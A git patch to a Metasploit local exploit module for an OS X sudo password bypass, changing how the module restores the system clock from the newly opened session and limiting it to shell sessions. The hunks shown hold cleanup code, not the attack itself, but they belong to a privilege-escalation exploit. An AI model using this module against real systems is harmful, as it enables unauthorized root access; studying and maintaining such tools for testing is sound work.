From 453247430968ecbfba6e8eb6bc9df295d27eff30 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Sat, 24 Aug 2013 09:47:40 -0500
Subject: [PATCH] Allow cleanup from the new session

---
 .../osx/local/sudo_password_bypass.rb         | 20 ++++++++++---------
 1 file changed, 11 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb
index b73c2afbff..a2a653b84d 100644
--- a/modules/exploits/osx/local/sudo_password_bypass.rb
+++ b/modules/exploits/osx/local/sudo_password_bypass.rb
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Local
 				],
 			'Platform'      => 'osx',
 			'Arch'          => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],
-			'SessionTypes'  => [ 'shell', 'meterpreter'],
+			'SessionTypes'  => [ 'shell' ],
 			'Targets'       => [
 				[ 'Mac OS X x86 (Native Payload)',
 					{
@@ -153,12 +153,12 @@ class Metasploit3 < Msf::Exploit::Local
 	end
 
 	def cleanup
-		do_cleanup_once
+		do_cleanup_once(session)
 		super
 	end
 
 	def on_new_session(session)
-		do_cleanup_once
+		do_cleanup_once(session)
 		super
 	end
 
@@ -193,19 +193,21 @@ class Metasploit3 < Msf::Exploit::Local
 		print_good output
 	end
 
-	def do_cleanup_once
+	# cmd_exec doesn't allow to get a session, so there is no way to make the cleanup
+	# from the new privileged session, when called from the on_new_session callback.
+	def do_cleanup_once(session)
 		return if @_cleaned_up
 		@_cleaned_up = true
 
 		print_status("Resetting system clock to original values") if @time
-		cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
-		cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
-		cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
+		session.shell_command_token("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
+		session.shell_command_token("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
+		session.shell_command_token("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
 
 		if @networked
-			cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
+			session.shell_command_token("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
 			unless @network_server.nil?
-				cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
+				session.shell_command_token("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
 			end
 		end